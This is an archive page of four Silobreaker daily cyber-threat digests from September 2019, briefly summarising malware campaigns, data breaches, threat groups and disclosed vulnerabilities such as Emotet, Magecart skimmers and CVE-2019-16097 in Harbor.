Silobreaker Daily Cyber Digest – 20 September 2019

Archive for the ‘Threat Reports’ Category

Silobreaker Daily Cyber Digest – 20 September 2019

 

Malware

Agent Tesla leveraged in email campaign

  • Discovered by Xavier Mertens, the email campaign attempts to deliver an ACE archive labelled ‘Parcel Frieght Details.pdf.ace’, which contains a malicious Agent Tesla executable. This executable is capable of contacting an attacker’s C2 server via SMTP, FTP and HTTP to exfiltrate data.
  • The C2 server used in this instance belongs to a Pakistan-based healthcare company, but it is located in Los Angeles, US. It has many open ports and vulnerabilities, and has been compromised by the attacker behind the campaign for data exfiltration purposes.

Source (Includes IOCs)

 

Malicious extensions removed from Chrome Web Store

  • Two extensions, ‘AdBlock’ by ‘AdBlock, Inc’ and ‘uBlock’ by ‘Charlie Lee’ used misleading names, similar to those of legitimate extensions, and were also performing cookie stuffing – a technique where extra information is added to users cookies to hijack traffic from its legitimate source. The two extensions where adding a parameter to cookies to ensure that the authors would earn a commission from any payments on certain sites.
  • ‘AdBlock’ had over 800,000 installs, and ‘uBlock’ had over 850,000 at the time of their removal from the Chrome Web Store. Google also disabled the extensions on all users’ browsers.

Source

 

Two adware apps on Google Play Store have over 1.5 million downloads

  • Researchers at Wandera discovered two selfie filter camera apps, Sun Pro Beauty Camera and Funny Sweet Beauty Camera, which contain adware. The apps are hosted on the Google Play Store and have a combined download count of 1.5 million. 
  • Sun Pro Beauty Camera displays full screen-ads even if the app is never opened. Funny Sweet Beauty Camera starts to display full-screen ads outside the app when a filtered photo is downloaded.  The researchers also found that the apps had concerning permissions such as installing shortcuts, recording audio, and more.

Source

 

Ongoing Campaigns

New Emotet campaign already using new delivery methods

  • Following the revival of the Emotet botnet on September 16th, 2019, researchers are already reporting on evolving distribution methods, malicious attachments, and email templates. Researchers have speculated that the Emotet is owned by TA542 who rent out parts of the botnet to other threat actors.
  • To date, Emotet has been delivered via attachments or through malicious links contained in emails.  Malicious document are designed to trick targets into enabling macros by claiming that the file is in ‘Protected View’ or by stating that they must ‘Accept the License agreement’. In both instances, enabling content results in the installation of Emotet. Additionally, researchers observed attackers employing PowerShells, or WScript to execute JScript to install the payload.
  • Security researchers Cryptolaemus identified that Emotet has split into three ‘Epochs’ which are subgroups of the overall botnet. Each Epoch uses its own C2s, distribution methods, payloads, and assigned bots.

Source (Includes IOCs)

 

GhostMiner malware uses file less attack method and damages rival miners

  • On August 2nd, 2019, researchers at Trend Micro identified a fileless cryptocurrency malware, named GhostMiner, that uses Windows management instrumentation (WMI) objects to install persistence, payload mechanisms, and AV-evasion. 
  • The arrival details of this particular attack have not been discovered, but previously the malware has attacked servers by exploiting vulnerabilities in phpMyAdmin, MSSQL, and others. Once installed the virus drops a 64-bit payload that mines for Monero cryptocurrency. The wallet associated with this campaign has a value of approximately $3,868.
  • The malware also checks for rival miners such as MyKings, PowerGhost, PCASTLE, and others. When GhostMiner detects other miners, it terminates their processes and deletes scheduled tasks.

Source (Includes IOCs)

 

Android trojan campaign targeting banking customers

  • The campaign targets Russian customers of 70 banks, payment systems and web-wallets, and is estimated to have stolen at least 35 million rubles ($547,000). In particular, it targets users who place advertisements on Avito, a Russian classifieds website.
  • Fanta Trojan is delivered via a phishing site that pretends to be Avito, tricking a user into downloading the malicious application to their phone instead of the legitimate app. Bank details are then stolen by making a user open a phishing site that disguises as the legitimate mobile banking application.
  • Capable of bypassing anti-virus tools, the trojan also scans what apps are running on the user’s device, scanning notifications of banking applications, payment systems and e-wallets.

Source

 

Hackers steal over 20,000 US citizens card details by targeting Click2Gov portal  

  • Researchers at Gemini Advisory discovered that during August 2019 hackers compromised eight Click2Gov portals used by cities across the US. The researchers discovered that the hackers have stolen 20,000 card details which are already being traded on the dark web.  Click2Gov is a web-based self-service portal that handles tax and bill payments for municipalities across North America, the product is sold by Central Square.
  • Click2Gov was originally targeted in 2017 by a hacker group using custom malware tools, named Spotlight and Firealarm, that had been specially designed to access the portal. The group stole over 300,000 card details from at least 46 cities in 2017 and 2018.
  • Out of the eight cities attacked in August 2019, six had been breached in 2017 and 2018 which suggests the hackers may have left a backdoor. However, this has not been confirmed, additionally it is unclear how the hackers breached the portals of the two previously unaffected cities.

Source

 

 

Leaks and Breaches

Thinkful Inc data breach results in mass password reset

  • Code training company Thinkful Inc notified customers that an employees account credentials were compromised by an unauthorized party.  The company stated that users who login to the platform will have to reset their password.
  • Thinkful Inc stated that there is no evidence that any customer data or user information had been accessed.

Source

 

Magellan Health subsidiaries suffer data breach

  • A statement issued by Magellan Health said that two of its subsidiaries, National Imaging Associates and Magellan Healthcare had discovered a potential cyber breach related to members of Presbyterian Health Plan. An anonymous third party gained access to two employee email accounts between May 28th and June 6th, 2019 via a phishing campaign. Potentially exposed data includes names, dates of births, health authorization information, dates of service and some Social Security Numbers.
  • The Magellan Health incident is claimed to have impacted almost 56,000 individuals, and the National Imaging Associates breach affected around 600.

Source

 

Verlo Mattress Factory expose over 387,000 customer records

  • Researchers at Security Discovery identified an unprotected Elastic database that belonged to Verlo Mattress Factory. The researchers found 387,604 records which contained names, phone numbers, emails, home addresses, and billing addresses. The database also exposed login details and hashed passwords for internal users, and IP addresses, ports, and more.
  • The researchers contacted Verlo Mattress Factory but did not receive any reply. The database was however secured soon after initial contact was made.

Source

 

Vulnerabilities

Vulnerability discovered in popular WordPress plugin

  • A cross-site scripting vulnerability was discovered in Easy Social Feed, a popular WordPress plugin with over 100,000 installs. Publicly released proof-of-concept code could allow an attacker to interfere with a visitors browsing session.
  • As of September 20th, 2019, version 4.4.1 is available to download, but it is not clear from the changelog if this issue is fixed.

Source

 

General News

Chinese students in UK targeted by scammers

  • Researchers at Malwarebytes stated that the scam appears to have begun in 2015. The criminals pretend to represent government bodies or law enforcement and claim that visa issues can be resolved with a payment. The attackers have also begun to target Indian students and demand payment via Western Union. 

Source

 

Old Magecart domains being bought for additional threat campaigns

  • Researchers at RiskIQ identified that sinkholed domains that have been used in Magecart attacks are being bought by criminals when they are re-released back to the pool of available domains.  The domains retain their value as they still make ‘call-outs to malicious domains placed on breached websites by attackers’. Attackers can continue to launch Magecart attacks or can use them for malvertising or ad-fraud schemes.

Source 1 Source 2

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 19 September 2019

 

Malware

Ramnit returns with new capabilities

  • Researchers at RSA Security observed several changes in the functionality, targets and methods of distribution of Ramnit. The banking trojan was first discovered in 2010 and operates as a botnet targeting the banking industry in North America and Europe.
  • The new variant uses web injects to steal credentials and was seen targeting Japanese entities. Additionally, rather than using its worm capabilities for distribution, the new variant is spread via executable files, specifically by using malspam campaigns to deliver the files.
  • A detailed analysis on the recent findings is available in the Q2 2019 RSA Quarterly Fraud Report.

Source

 

Ongoing Campaigns

DDoS attack using WSD method peaks at 35 GB per second

  • Researchers at Akamai identified a DDoS attack against one of their clients in the gaming industry which used a UDP amplification technique known as WS Discovery (WSD). The WSD protocol is used in an array of network devices. 
  • The researchers found a wide range of exposed CCTV cameras and DVR systems on the internet that were incorrectly exposing and responding to WSD. 
  • Due to UDP being a stateless protocol, requests to the WSD service can be spoofed. Hackers can therefore use these devices to amplify the power of their attacks. The researchers stated that using this attack method could amplify the original byte size up to 15,300%, which places the method 4th on the DDoS attack leaderboard for highest reflected amplification rates.

Source

 

Microsoft phishing page emails stolen credentials to attacker

  • Security researchers at MalwareHunterTeam identified a new phishing scam which relayed stolen details to an attacker by using SmtpJS service to send an email via JavaScript. Usually in such cases, the stolen information is stored on a database or sent to the attacker via a backend script.
  • Analysis of the configuration being used by SmtpJS displays the sender’s email address and the email address that stolen information will be sent to. Using this method of credential delivery is dangerous for the attacker and could allow law enforcement and researchers to easily identify them.
  • Reporters at Bleeping Computer stated that there was ‘nothing special’ about the phishing page itself.

Source

 

Smominru botnet continues to pose major threat

  • Researchers at Guardicore Labs have been tracking the Smominru botnet and its variants since 2017. The researchers identified 90,000 machines around the world which were compromised with Smominru in August 2019. Attacks using the botnet are indiscriminate and reach victims in a range of sectors.
  • The botnet primarily compromises Windows machines using the EternalBlue exploit. Older versions of Windows, such as Windows 7 and Windows Server 2008 represent 85% of all infected machines. The researchers found that in a quarter of cases reinfection occurred after cleaning, which suggests that targets are failing to identify the infection path. 
  • When a machine is compromised, Smominru attempts to block other malwares activity, installs numerous backdoors and downloads tools that can steal credentials, cryptocurrency and more. The malware also attempts to move laterally through infected networks.
  • A full analysis of Smominru including indicators of compromise is available via Guardicore Labs.

Source (Includes IOCs) 

 

Magecart attack targets hotel chain booking website

  • In early September 2019, researchers at Trend Micro identified a Magecart attack targeting the booking websites of chain hotels. The malicious JavaScript has been present since August 9th, 2019, and only ran on Android or iOS phones. 
  • Both websites were developed by Spanish company Roomleader. The malicious code was injected into the ‘viewedHotels’ script developed by the company and used by the hotel chains. The attacker replaced the original credit card form with their own one too ensure that they gain a complete set of details. 
  • When a user attempts to submit a form on the site the skimmer copies names and values such as names, email addresses, telephone numbers, hotel room preferences, and credit card details. Copied information is encrypted with an RC4 hardcoded key and encrypted again with XOR before data is sent via HTTP POST to a remote URL specified by the attacker.

Source

 

Hacker Groups

Tortoiseshell Group targets IT providers in the Middle East

  • Researchers at Symantec discovered a new threat actor, dubbed Tortoiseshell Group, which has been active since at least July 2018, targeting IT providers in the Middle East. Researchers have identified 11 organisations that have been targeted by Tortoiseshell so far, the majority of which are in Saudi Arabia. The researchers stated that the group is attacking IT providers in order to compromise their customers. 
  • At present the group’s initial attack vector is unclear, however, researchers suspect that they compromise web servers to deploy onto target networks. Following the initial infection, the group uses a mixture of custom and off-the-shelf malware.
  • Tortoiseshell developed its own basic backdoor malware, named Backdoor.Syskit, which downloads and executes additional tools and commands and relays system information to the attacker’s C2. 
  • The group also uses publicly available info stealers and Powershells. At least two of Tortoiseshell’s victims had info gatherers deployed to their Netlogon folder on a domain controller. Researchers stated that this indicated that the attackers had domain level access on those networks.

Source (Includes IOCs) 

 

Leaks and Breaches

Exposed server contained 1.7 TB of data from Russian telecoms providers

  • UpGuard researchers discovered a publicly accessible rsync server containing 1.7 TB of data from multiple Russian telecommunication providers. The majority of data appears to be linked to Nokia and Mobile TeleSystems. According to Nokia, the data set ‘was a hand-over folder’ belonging to an unnamed third-party that failed to follow Nokia’s security procedures. In addition, the data set was not hosted by Nokia. The server has since been secured.
  • Exposed data included schematics, administrative credentials, email archives, and more, relating to telecom infrastructure projects, as well as photographs and installation instructions for the telecommunication interception hardware SORM.

Source

 

Scotiabank exposes sensitive information via public GitHub repositories

  • Security researcher Jason Coulls found public GitHub repositories containing sensitive information belonging to Scotiabank, including software blueprints, access keys for foreign exchange rate systems, mobile application codes, login credentials for services, database instances, and more.
  • According to Coulls, who discovered the bank to be using expired security certificates in 2017, Scotiabank ‘usually leak information once every three weeks on average.’ Scotiabank has not commented on the incident, however, its security team is investigating the matter.

Source

 

24 million patient records exposed in major medical data leak

  • The research conducted by Greenbone Networks concerning the massive data leak of medical data found 24 million exposed patient records, with 700 million images related to these records, 400 of which are downloadable.
  • The previously reported number of 16 million records was a figure discovered by ProPublica and Bayerischer Rundfunk, who also investigated the data leak.

Source

 

Vulnerabilities

XSS vulnerabilities found in Social Metrics Tracker plugin

  • A persistent cross-site scripting (XSS) flaw was found in the WordPress Social Metrics Tracker plugin due to an improperly secured export functionality, as well as a potential reflected XSS vulnerability.

Source

 

phpMyAdmin contains zero-day vulnerability

  • A medium-severity cross-site request forgery vulnerability, tracked as CVE-2019-12922, in phpMyAdmin could allow an attacker to delete servers configured on the configuration page of a phpMyAdmin panel. Security researcher Manuel Garcia, who discovered the flaw, points out that this is only possible with interaction between the attacker and victim.
  • The vulnerability is present in all versions of phpMyAdmin up to 4.9.0.1 as well as phpMyAdmin 5.0.0-alpha1.
  • The company failed to release a patch within 90 days of receiving Garcia’s report, which led him to release details and a proof-of-concept of the flaw.

Source

 

VMware issues patches for multiple vulnerabilities

Source

 

Update to Windows Defender breaks Quick and Full antivirus scan

  • Windows Defender 4.18.1908.7 is impacted by a bug that prevents users from performing Quick or Full scans. When performing either of these operations Windows Defender only scans approximately 40 files on the device before terminating the process.
  • Microsoft resolved the issue by releasing an updated version of Windows Defender on September 18th, 2019.

Source

 

Critical vulnerability discovered in Harbor allows privilege escalation

  • Security researcher Aviv Sasson at Palo Alto Networks Unit 42 identified a critical vulnerability, tracked as CVE-2019-16097, in the open source cloud native registry Harbor 1.7.0 through 1.8.2.
  • The flaw allows non-administrative users to create administrator accounts by creating a script that send a post request to ‘api/users’. The flaw allows an attacker to take over Harbor registries.
  • The issue was patched by Harbor developers, however researchers discovered over 1,300 Harbor registries open on the internet which are still vulnerable.

Source

 

General News

Australian Senate President admits data was stolen in 2018 parliament hacking

  • During questioning by Centre Alliance Senator Rex Patrick, Senator Scott Ryan confirmed that a ‘small amount of data’ was taken in the 2018 Australian parliament hacking, however none was deemed sensitive.
  • Senator Ryan refused to give details regarding the recent reports from Reuters that Australian security agencies concluded China was behind the hacking.

Source

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 18 September 2019

 

 

Malware

New TSCookie variant uses new configuration and communication protocols

  • Researchers at Japan’s Computer Emergency Response Team Coordination Center observed a new variant of TSCookie being deployed in a campaign by BlackTech, targeting Japanese users.
  • The malware consists of a loader and a downloader and is used once the threat actor has gained access to a targeted network. The loader, in EXE or DLL format, is capable of reading and executing files. The loader also decrypts the downloader, which is RC4-encrypted. The downloader is then executed in memory.
  • The new variant supports HTTP, HTTPS and custom protocol and any data sent is also RC4-encrypted.

Source (Includes IOCs)

 

Increase in activity from TFlower ransomware

  • The malware was first discovered in early August 2019 and is installed on devices after criminals gain access to exposed remote desktop services. TFlower malware infects local machines and also attempts to move laterally through compromised networks.
  • Following the initial infection, the malware begins encrypting files on the victim’s machine and connects to the attacker’s C2 to provide status updates. The ransomware avoids files in the Windows or Sample Music folder. TFlower also attempts to disable the Windows 10 repair environment and tries to delete Shadow Volume Copies.
  • Once the encryption process is complete the malware will leave a ransom note on the victim’s machine. Researchers are currently trying to determine if there is a flaw in TFlower, which could allow impacted users to decrypt their files.

Source (Includes IOCs)

 

New variant of HDDCryptor discovered

  • Researchers at Trend Micro discovered a new variant of HDDCryptor, also known as Mamba, which is known to use the open-source tool DiskCryptor for encryption and overwriting of the Master Boot Record.
  • The new variant was found to use a modified DiskCryptor component and, in addition, changes in the contact information provided in the ransom note were also found. The remainder of the variant behaves the same as the original version first discovered in 2016.
  • The researchers warn that threat actors continue to use such open-source tools to avoid detection by security solutions and that partially modified tools could lead to false alarm cases.

Source (Includes IOCs)

 

Ongoing Campaigns

Scam targets Venmo LLC users via text messages

  • The Dighton Police Department issued a warning about a phishing scam targeting Venmo LLC customers. The attackers deliver a text message to victims, which contains a malicious link to a fake Venmo login page. Targets are instructed to login to avoid charges being applied to their account.
  • Regardless of the validity of the login that a user provides the phishing page will allow them to proceed to a secondary page where financial information such as a bank card numbers are requested.

Source

 

Restaurant Depot customers targeted in phishing attacks following data breach

  • A phishing campaign is targeting customers of the New York-based wholesale vendor Restaurant Depot by sending fake invoices containing malicious links. The emails appear to be sent from the company’s mailing list.
  • Restaurant Depot has stated it is aware of the email list compromise and has advised its customers to delete any emails indicating an invoice is due without opening it.

Source

 

Fake IRS page used to drop Amadey botnet

  • Researchers at Cofense discovered a new phishing campaign that delivers Amadey botnet. The malware was first seen at the end of the first quarter of 2019 and is rented out to cybercriminals. Notable users include the threat group TA505 who used the botnet in July 2019 to deliver email stealers and FlawedAmmy RAT.
  • This recent campaign begins with an email which purports to be from the Internal Revenue Service (IRS) and provides a hyperlink to a fake IRS login page. The email states that the target is eligible for a tax refund and provides them with a password and username.
  • When the target logs into the fake page they are told they can gain their refund by downloading a document which is contained within the attached ZIP file. Targets who access the file download a highly obfuscated and encrypted VBScript which drops and installs Amaedy. The botnet communicates with the attackers C2 and relays information such as the device’s antivirus software, system name, and operating system.

Source (Includes IOCs)

 

Hacker Groups

Panda cryptomining threat group continue to pose a threat to organizations globally  

  • Researchers at Cisco Talos published an analysis of the Panda threat group. Their research found that the criminals continue to update their infrastructure, exploits and payload. The Panda group was first spotted in Summer 2018 and focuses on mining Monero with RATs and cryptoming malware. The group have targeted financial, healthcare, transportation and IT organizations.
  • Despite their lack of sophistication and poor operational security, the group are ‘one of the most active attackers’ that the researchers have examined. Panda are able to change their infrastructure and exploits rapidly and are currently using exploits previously used by threat actor Shadow Brokers. The group are also comfortable using open source tools such as the credential stealer Mimikatz. 

Source (Includes IOCs)

 

Identity of operator behind Adwind RAT family revealed

  • Researchers at Palo Alto Networks identified the developer behind the multi-platform Adwind RAT family, which was first sold in early 2012. Since its first iteration the malware has been rebranded at least seven times and has moved from being a commodity malware to one which is sold to a closed customer base.  The researchers state the RAT has consistently been under the ownership of the original author despite its many rebrands. 
  • The researchers noted that the developer behind the malware operated ‘uncommonly good’ operational security. The author changed his domains, hosting services and infrastructure with every rebrand as well as faking WHOIS records.
  • The researchers were also able to identify Adwind’s developer by establishing a link between an email address used in a Skype profile, used to sell the malware and an academic paper from a Mexican student studying computer science. The researchers discovered the developer’s name, place of study and hometown and refer to him as ‘Adwind Andrés’.

Source (Includes IOCs)

 

Leaks and Breaches

Medical records of millions of individuals worldwide exposed online

  • Research conducted by Greenbone Networks, ProPublica, and Bayerischer Rundfunk revealed that hundreds of servers worldwide are exposing medical data. The data can be accessed with free software or through a web browser. Exposed data includes X-rays, MRIs, CT Scans, patient names, dates of birth, and where applicable, social security numbers.
  • ProPublica identified 187 exposed servers in the US that belonged to doctors’ offices, medical-imaging centers and mobile X-ray services. US based company MobilexUSA exposed the data of over a million patients. The data, which included dates of births, doctors, and procedures, was accessible by performing a simple data query.
  • Greenbone Networks determined that there were issues in at least 52 countries related to the exposure of sensitive medical information. In total, medical information from more than 16 million scans worldwide was discovered during the research. 

Source

 

Kiwi Farms suffers data breach

  • At least 4,606 users of the forum Kiwi Farms have been affected by a data breach that took place on September 10th, 2019. Exposed data includes email addresses, IP addresses, dates of birth, as well as user content.

Source

 

118,000 individuals potentially affected by 2018 Ramsey County data breach

  • A data breach that took place in Ramsey County, Minnesota, in 2018, may have exposed personal and health information of 118,000 individuals, a major increase from the initial number of 500 that was given by county officials.
  • The data breach was the result of unauthorised access to 28 county email accounts on August 9th, 2018, during which the attackers attempted to steal employee paychecks.
  • Potentially exposed data includes names, addresses and Social Security numbers of 4,600 individuals, and ‘limited amounts of health-related information’ of 113,300 individuals.

Source

 

Lion Air exposes tens of millions of records through exposed Amazon bucket

  • Security researcher Under the Breach published samples of two databases that belong to Lion Air. The databases were stored in an open Amazon Web Services (AWS) bucket. Links to the open AWS bucket were published on August, 10th, 2019 and have been circulating on data exchange forums. 
  • The first database contains 21 million records and the second contains 14 million records. Most of the information belongs to Lion Air owned companies Malindo Air and Thai Lion Air.
  • Leaked customer information includes, passenger and reservation IDs, physical addresses, phone numbers, email addresses, dates of birth, passport numbers, phone numbers, and more.

Source

 

Researchers discover databases containing personal information collected by GootKit network

  • On July 5th, 2019, researchers at Security Discovery found two open and publicly accessible MongoDB databases linked to GootKit, one of the most advanced banking trojans. It was taken down on July 10th, 2019.
  • The databases contained the personal data that GootKit had stolen, which showed that all infected machines were located in Europe, predominantly in Poland, France, United Kingdom, Italy, and Bulgaria.
  • Exposed information included plain text passwords, configuration details, bank accounts, mail account logins, online shops, credit card details, and more. An estimated 1,444,375 email accounts were compromised, as well as 2,196,840 passwords and configuration pairs and 752,645 usernames.

Source

 

Vulnerabilities

Authentication bypass vulnerability found in Ewebtonic software

  • A vulnerability in Ewebtonic’s software allows threat actors to upload files, shells or backdoors on devices without the need of administrator permission. This is possible due to improper identity verification procedures. Once a threat actor gains permission, they could also access sensitive data or carry out arbitrary code execution.

Source

 

Google Calendar app publicly displays company information

  • Researcher Avinash Jain identified an issue with the Google Calendar app which allowed him to access company information such as meetings, events, presentation links, and more.
  • Jain discovered that a Google dork search showed over 200 calendars which contained sensitive company information. 
  • The issue is an intended feature of Google Calendar, however the researcher stated that Google does not notify a user if their settings are public and does not notify a company if an employee makes their calendar public.\a

Source

 

Cisco extends patch for 2016 DoS vulnerability

  • The high-severity vulnerability, tracked as CVE-2016-1409, is found in the IPv6 packet processing function and could allow a remote attacker to intercept a device from processing IPv6 traffic by sending crafted IPv6 Neighbor Discovery packets. This could lead to a denial-of-service (DoS).
  • Affected products are Cisco IOS XR, Cisco IOS, Cisco XE, Cisco NX-OS, Cisco ASA and Cisco StarOS. As the flaw is the result of a vendor misconfiguration, products by other vendors are also affected, including Huawei and Juniper Junos.

Source

 

Aspose PDF API contains multiple vulnerabilities

  • Researchers at Cisco Talos identified flaws in Aspose APIs that are used to process PDFs. The vulnerabilities can be triggered by tricking a target into opening a specially crafted malicious file while they use a vulnerable API. A full list of flawed components and their associated CVEs are accessible via Cisco Talos.

Source

 

Over 15,000 web connected cameras exposed worldwide

  • Researchers at WizCase identified over 15,000 potentially vulnerable webcams which could be accessed by anyone with an internet connection. The webcams are exposed due to an issue with their remote access functionality. In some instances the UPnP was not protected with any authentication, in other cases insecure P2P networking was used.
  • Exposed device types include AXIS net cameras, Cisco Linksys webcams, IP WebCams, Yawcams, and more. The cameras were present in a range of locations including homes, businesses, and public spaces. 

Source 1 Source 2

 

General News

ConnectWise Control used in Texas ransomware attacks

  • The investigation into the Texas ransomware attacks that targeted 22 government entities in August 2019 found that a ConnectWise Control used by TSM Consulting was used as an entry point to the networks.
  • According to ConnectWise’s CISO John Ford, because an on-premise version of the product was used, the company does not have access to the logs or configuration, meaning they do not know whether TSM Consulting used up-to-date versions of the product, whether multi-factor authentication was turned on or how frequently TSM Consulting patched.

Source

 

Facebook removes multiple fraudulent accounts

  • Facebook removed multiple Facebook and Instagram accounts that were involved in two campaigns of coordinated inauthentic behaviour in which users were misrepresenting themselves. No links between the two campaigns were found.
  • This included 76 Facebook accounts, 120 Pages, one Group, two Events and seven Instagram accounts engaged in domestic-focused coordinated behaviour in Iraq and 168 Facebook accounts, 149 Pages, and 79 Groups involved in domestic-focused coordinated inauthentic behaviour in Ukraine.

Source

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 17 September 2019

 

Malware

Skidmap malware achieves persistence through loadable kernel modules

  • Researchers at Trend Micro have identified a Linux based virus dubbed Skidmap malware, designed to infect a system and deliver a cryptominer. 
  • Skidmap installs itself via crontab before decreasing the infected device’s security settings and establishing backdoor access by adding the public key of its handler to the authorized keys file. It also creates a secondary access point by replacing the module responsible for Unix authentication with its own malicious version. 
  • The binary then checks if the target system runs on Debian OS or RHEL/CentOS and drops the miner and other components accordingly. Skidmap achieves persistence by using loadable kernel module (LKM) rootkits to overwrite or modify parts of the OS kernel. 

Source (Includes IOCs)

 

Ongoing Campaigns

Emotet botnet returns with new spam campaign

  • On September 16th, 2019, the operators behind Emotet botnet, which leverages Emotet Trojan, launched a new global spam campaign.  Attacks have already been reported against government entities, individuals, and companies in Europe and the US. 
  • The new campaign follows the reawakening of the botnet’s C2 servers on August 22nd, 2019.  The operators behind Emotet prepared for the attack by cleaning fake bots, putting together the new campaigns, and establishing distribution channels.
  • Researcher at Cofense Labs stated that the malicious messages used in the campaign originated from 3,362 compromised email accounts. The campaign is targeting nearly 66,000 unique emails from more than 30,000 domain names from 385 unique top-level domains.
  • The content of emails used in the campaign tend to be financially themed and contain a malicious attachment which the target is lured into opening. Security researchers James_inthe_box and Brad Duncan identified that Trickbot malware is being delivered after the initial infection.

Source (Includes IOCs)

 

The Guardian’s SecureDrop whistle-blower site targeted with phishing page

  • Security researcher Sh1ttyKids identified a phishing page that mimicked The Guardian’s Tor based SecureDrop site which whistle-blowers can use to contact journalists. The attackers were attempting to acquire the unique ‘codename’ used by whistle-blowers.
  • The malicious site, which has now been removed, also contained a link to an Android app which purported to hide a user’s location. In actuality the app contains multiple RAT like functions which allow for monitoring location, calls, texts, data stealing, and more.

Source

 

Threat actor uses stolen identity to purchase legitimate digital certificates

  • Researchers at ReversingLabs observed a threat actor impersonating company heads, especially ones in the software industry, when purchasing digital certificates, which are then sold on the dark web to be used for digitally signing malware.
  • The researchers’ analysis of one such impersonation attack showed that the fraudulently obtained certificate was used to sign 22 executable files, with those that were malicious belonging to the OpenSUpdater malware family.
  • A detailed analysis of the attack is available on ReversingLabs’ blog.

Source (Includes IOCs)

 

Hacker Groups

Charming Kitten active again after short absence

  • ClearSky researchers observed an increase in activity by Charming Kitten, also known as APT35, Ajax, or Phosphorus, after a short absence following the 2019 Microsoft complaint against the group’s operation. The group also does not appear to have been affected by the sensitive data leak of Iranian APT groups in April 2019.
  •  The new campaign targets non-Iranian academic researchers from the US, the Middle East and France with a research focus on Iran, as well as Iranian dissidents in the US. Since August 2019, the group was observed targeting influential public figures, moving away from solely targeting academic researchers.
  • Additionally, the researchers discovered the group now adds trackers to its email correspondence, allowing it to track forwarded emails and obtain information on geolocations.

Source (Includes IOCs)

 

Leaks and Breaches

Database leaks information of over 20 million predominantly Ecuadorian individuals

  • Researchers at vpnMentor discovered an exposed database which belonged to Ecuadorian consulting company Novaestrat. The database contained 18GB of data and the details of over 20 million individuals, the majority of whom are Ecuadorian. Some of those on the database appear to be deceased.
  • Information on the database appears to have been collated from a number of sources, which include Ecuadorian government registries, automotive association Aeade, and defunct Ecuadorian national bank Biess.  Each individual on the database can be identified by a ten-digit ID code which most likely corresponds with the Ecuadorian ‘cédula de identidad’ which is similar to a US social security number.
  • Entering the ten digit code displays related personal information such as full name, gender, date of birth, contact details, address, date of death, level of education, and more. Data relating to an individual’s family members, employment information, and if applicable, Biess related banking details could also be found.
  • The data also contained information about Ecuadorian companies such as their contact information, taxpayer identification number, and legal representatives. The data breach has now been closed but its exposure could lead to long term consequences for listed individuals.

Source

 

Hacker leaks information of 24.3 million Lumin PDF users

  • On September 16th, 2019, a hacker released Lumin PDF’s entire user database which contained the details of 24,386,039 customers. Lumin PDF is a cloud-based service used for accessing PDF files. The product is made by Nitrolabs and is one of the third-party PDF apps that can be used on Google Drive. 
  • The hacker claims to have gained the information from an exposed MongoDB database in April 2019. The hacker also stated that the original database was taken down following a ransomware attack. 
  • Data contained in the files includes full names, email addresses, gender, locale settings, and a hashed password string or Google access token. The majority of users have a Google access token linked to their account which could allow attackers to gain access to their Google Drive. The CEO of Nitrolabs acknowledged the breach but denied that the data contained valid Google access tokens. Both Lumin and Google are currently investigating the issue.

Source

 

Robstown Police Department hit by cyberattack

  • Robstown Police Department’s servers were compromised by some unnamed malware, resulting in the loss of data, including evidence and reports related to pending investigations from 2018 and 2019.

Source

 

Vulnerabilities

LastPass bug can reveal passwords

  • Security researcher Tavis Ormandy identified a flaw in LastPass which allowed him to retrieve a user’s most recent LastPass login information.  An attacker could exploit the vulnerability by luring their victim onto a malicious page and tricking the browser extension into providing a previously used password. The flaw is caused by a failure to update a cache correctly.
  • LastPass patched the vulnerability but also stated that the bug would have only worked in a ‘limited set of circumstances on specific browser extensions’.

Source 1 Source 2

 

Certain AMD Radeon cards contain remote code execution vulnerability

  • AMD Radeon cards in the Radeon RX550 and the 550 Series while running VMWare Workstation 15 contain a vulnerability in their ATIDXX64[.]DLL driver. The flaw, tracked as CVE-2019-5049, can be triggered by an attacker who provides a specially crafted shader file, causing an out-of-bounds memory write.  The attack can be launched from within a VMware guest and can potentially cause code execution on the associated VMware host.

Source

 

Atlassian’s Jira software contains multiple vulnerabilities 

  • Researchers at Cisco Talos discovered multiple vulnerabilities in a range of Atlassian’s Jira software products. The bugs could be exploited to execute code inside of Jira, disclose information, and more. A full list of impacted products and their associated vulnerabilities is available via Cisco Talos.

Source

 

XSS flaw found in Simple Fields plugin

  •  A cross-site scripting (XSS) vulnerability was found in the WordPress Simple Fields plugin, which could allow an attacker to inject malicious JavaScript code. Further insecure code was also found in the plugin, as well as additional vulnerabilities.

Source

 

Security vulnerability in Uber allows for account take-over

  • Security researcher Anand Prakash discovered a vulnerability in Uber that could allow an attacker to track a user’s location and take rides from their accounts. The vulnerability also affects Uber driver and Uber Eats accounts.
  • The vulnerability can be exploited via an API request to obtain a user’s universally unique identifier (UUID). With the UUID, Prakash managed to gain access to private information, including access token, location and address. Using the mobile apps access token, the researcher was able to fully compromise a test account.
  • The vulnerability has since been fixed.

Source

 

Numerous vulnerabilities found in SOHO routers and NAS devices from multiple products

  • The SOHOpelessly Broken 2.0 project, which analysed small office/home office (SOHO) router and network-attached storage (NAS) devices, found a total of 125 vulnerabilities across a range of networking hardware. Tested products included devices from Buffalo Americas, Synology, TerraMaster Technology, Zyxel, Drobo Inc, ASUS, Asustor Inc, Seagate Technology, QNAP Systems, Lenovo, Netgear, Xiaomi, and Zioncom.
  • At least one of the flaws in each product could allow remote shell access or access to the admin interface, as they are vulnerable to either cross-site scripting, OS command injection or SQL injection compromises.
  • Six of the products contained vulnerabilities that could allow a threat actor to remotely gain complete control of a device without the need for authentication. The affected products are Asustor AS-602T, Buffalo TeraStation TS5600D1206, TerraMaster F2-420, Drobo 5N2, Netgear Nighthawk R9000, and TOTOLINK A3002RU.
  • The full list of vulnerabilities is available in the project’s whitepaper.

Source

 

